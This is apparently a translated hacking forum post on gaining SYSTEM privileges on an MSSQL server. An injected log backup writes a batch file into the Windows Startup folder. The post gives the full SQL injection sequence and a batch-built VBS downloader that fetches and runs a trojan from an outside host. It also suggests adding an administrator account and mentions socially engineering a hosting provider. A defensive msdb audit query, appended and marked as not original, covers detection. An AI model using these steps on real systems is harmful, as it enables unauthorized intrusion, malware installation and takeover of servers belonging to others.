Download MSSQL differential backup software with system Permissions
I had no intention of entering any website when I was searching for information on the internet yesterday; I ended up on the site in a muddled way. I couldn't escalate privileges. Then I added the service provider's QQ number to try a bit of social engineering, and after chatting for half a day I learned that the server's security was provided by Green Alliance (NSFOCUS). Then I asked the pig whether there was any way to escalate privileges, and he just sent me this video tutorial. I found the article on the internet and copied it here together with it. Recently I have been busy studying and seldom paying attention to this area; I'm falling further and further behind......
Below are the materials and the video tutorial found online.
This internal TEAM material has been sitting on the shelf for a long time. If it isn't released now, someone will discover it sooner or later anyway! In that case, share it with everyone!
Using an MSSQL differential backup to obtain a webshell is old news by now, so instead we can use the differentially backed-up file as malicious code.
Once the system executes it, will it automatically escalate privileges or add an administrator? Of course the answer is yes. kj021320 has tested it N times, so I can tell you that!
So we have to consider where the file goes: where will the system run it? This is actually obvious!
You don't need to be told: C:\Documents and Settings\All Users\Start Menu\Programs\Startup
The location is settled! So what kind of file can we back up for the system to execute?
This is the first key point!
Exe, js, vbs and bat files are the first to come to mind.
Let's analyze them one by one. Exe? Absolutely not: an MSSQL differential backup will certainly break an exe with all the junk data it inserts!
Reject.
Then on to the scripts.
Can we comment out the junk data in VBS? Otherwise the VBS will fail to run! Anyone who has learned VBS knows that
there are two comment forms in VBS, ' and rem.
However, there will still be junk data that cannot be commented out.
Reject.
What about JS? JS has multi-line comments /* */, but the /* cannot be on the first line, can it?
Reject.
Finally, the most familiar one is left: bat!
OK. Let's continue the analysis. What is the comment in bat? It's also REM. Failed! If rem didn't work for vbs, it won't work here either!
So what should we do? It's actually very easy! What happens when we type a wrong command at the CMD prompt?
Having read this far, you may be able to think of the solution before reading the rest.
OK. Let's continue. Here is the most important point: we can use carriage returns to separate off the junk data that the differential backup adds!
The system just treats that junk as unknown commands! Our own commands are not affected!
Is the problem solved? No! During an MSSQL backup, junk characters appear every certain number of bytes, which will break our commands!
So we need to keep the number of statements as small as possible. The fewer the statements, the better.
Okay, so we can use the bat to write a VBS downloader, run the downloader, and finally get SYSTEM privileges through the trojan the downloader fetches.
The following is the BAT that generates the downloader, as modified by me.
Echo Set P = createObject("Microsoft.XMLHTTP") > k.vbs
Echo P.Open "GET", "http://www.isto.cn/t.exe", 0 > k.vbs
Echo P.Send(): set G = createObject("ADODB.Stream") > k.vbs
Echo G.Mode = 3: G.Type = 1: G.Open() > k.vbs
Echo G.Write P.ResponseBody: G.SaveToFile "t.exe", 2 > k.vbs
k.vbs
t
Once k.vbs runs, it downloads t.exe and saves it locally, and the next line runs it directly.
Remember to put carriage returns before the code I mentioned, to separate off the junk data. It is best to use two or more leading carriage returns.
Then carry out the differential backup:
Alter database ISTO set recovery full--
Create table cmd (a image)--
Backup log ISTO to disk='C:\cmd1' with init--
Insert into cmd (a) values (...6B2E7662730D0A740D0A)--
Backup log ISTO to disk='C:\Documents and Settings\All Users\Start Menu\Programs\Startup\1.bat'--
Drop table cmd--
OK, the bat is in place! How do we get the server to restart? Let's leave that question for you to discuss!
If 3389 is enabled on the server, it is even more convenient: just have the bat run a command to add an administrator instead!
(ISTO is the name used in the video tutorial.)
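Defensive counterpart, added here and not part of the original post or video: every BACKUP LOG / BACKUP DATABASE statement, including the ones above, is recorded in msdb, so an audit query over msdb.dbo.backupset and msdb.dbo.backupmediafamily can flag backups written into a Startup folder, with a non-backup file extension, or outside the sanctioned backup directory. The directory D:\SQLBackups\ is an assumed site convention; adjust it to your own.

```sql
-- Constructed audit query (not from the original post): list backup history
-- entries whose destination does not look like a normal backup file.
-- Assumption: legitimate backups for this instance live under D:\SQLBackups\.
SELECT
    bs.backup_set_id,
    bs.database_name,
    bs.type              AS backup_type,   -- D = full, I = differential, L = log
    bs.user_name,                          -- login that issued the BACKUP
    bs.backup_start_date,
    bmf.physical_device_name
FROM msdb.dbo.backupset AS bs
JOIN msdb.dbo.backupmediafamily AS bmf
    ON bmf.media_set_id = bs.media_set_id
WHERE bmf.device_type = 2                  -- 2 = backup written to a disk file
  AND (
        -- destination is a folder whose contents the OS or a user will execute
        bmf.physical_device_name LIKE '%\Start Menu\%'
        -- or the file extension is not one a backup job would use
     OR (    bmf.physical_device_name NOT LIKE '%.bak'
         AND bmf.physical_device_name NOT LIKE '%.trn'
         AND bmf.physical_device_name NOT LIKE '%.dif')
        -- or the file is outside the sanctioned backup directory
     OR bmf.physical_device_name NOT LIKE 'D:\SQLBackups\%'
      )
ORDER BY bs.backup_start_date DESC;
```

Because msdb history can be cleared with sp_delete_backuphistory, pair this query with a server audit on the BACKUP_RESTORE_GROUP action group and with a file-integrity check on the All Users Startup folder.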